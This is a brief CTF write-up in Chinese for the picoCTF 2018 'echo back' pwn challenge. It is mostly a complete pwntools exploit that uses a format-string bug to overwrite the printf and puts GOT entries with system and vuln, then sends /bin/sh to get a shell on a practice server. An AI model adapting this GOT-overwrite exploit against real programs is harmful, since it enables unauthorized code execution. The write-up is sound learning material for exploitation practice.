picoctf_2018_echo back
查看保护
有个格式化漏洞
攻击思路:利用格式化将printf_got改为system,但是只有一次,所以我们可以改fini段,或者将下面的puts_got改成vuln让程序继续运行一下,这样就可以输入/bin/sh来getshell了
from pwn import *
context(arch='i386', os='linux', log_level='debug')
file_name = './z1r0'
debug = 1
if debug:
r = remote('node4.buuoj.cn', 27771)
else:
r = process(file_name)
elf = ELF(file_name)
def dbg():
gdb.attach(r)
offest = 7
printf_got = 0x0804A010
puts_got = 0x0804A01C
vuln_addr = 0x080485AB
p1 = p32(printf_got + 2) + p32(printf_got + 2) + p32(printf_got) + p32(puts_got)
p1 += b'%2036c%7$hn' + b'%8$hn' + b'%31836c%9$hn' + b'%331c%10$hn'
r.recvuntil('message:\n')
r.send(p1)
r.recvuntil('message:\n')
r.sendline('/bin/sh\x00')
r.interactive()